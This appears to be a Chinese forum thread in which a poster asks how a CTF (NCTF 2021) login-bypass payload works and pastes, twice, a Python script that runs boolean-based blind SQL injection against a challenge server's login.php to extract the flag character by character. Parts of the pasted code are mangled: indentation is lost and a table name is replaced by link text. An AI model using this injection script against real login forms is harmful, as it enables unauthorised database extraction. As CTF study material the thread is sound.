level 5
Preacher12
楼主
没理解这个payload 怎么构造的。有没有大佬来解答一下。为啥password 传%s,name用数组传,name[1]=2又是为啥有啥用。楼下放writeup 。
2021年11月30日 15点11分
1
https://ctf.njupt.edu.cn/727.html
2021年11月30日 15点11分
level 5
Preacher12
楼主
2
level 5
level 5
Preacher12
楼主
import requests
rst = ""
url = "http://129.211.173.64:3080/login.php"
# sql = "database()"
# sql = "(select group_concat(table_name) from 网页链接 where table_schema regexp 0x32303231)"
# sql = "(select group_concat(column_name) from 网页链接 where table_name regexp 0x4e635446)"
sql = "(select group_concat(`fl@g`) from NcTF)"
for i in range(1, 100):
low = 32
high = 127
while low < high:
mid = (low + high) // 2
data = {
"password": "%s",
"name[0]": f") or (ascii(substr({sql},{i},1))>{mid})#",
"name[1]": "2"
}
rsp = requests.post(url=url, data=data)
if "NCTF" in rsp.text:
low = mid + 1
print(rsp.text)
else:
high = mid
rst += chr(high)
print(rst)
2021年11月30日 15点11分
4
rst = ""
url = "http://129.211.173.64:3080/login.php"
# sql = "database()"
# sql = "(select group_concat(table_name) from 网页链接 where table_schema regexp 0x32303231)"
# sql = "(select group_concat(column_name) from 网页链接 where table_name regexp 0x4e635446)"
sql = "(select group_concat(`fl@g`) from NcTF)"
for i in range(1, 100):
low = 32
high = 127
while low < high:
mid = (low + high) // 2
data = {
"password": "%s",
"name[0]": f") or (ascii(substr({sql},{i},1))>{mid})#",
"name[1]": "2"
}
rsp = requests.post(url=url, data=data)
if "NCTF" in rsp.text:
low = mid + 1
print(rsp.text)
else:
high = mid
rst += chr(high)
print(rst)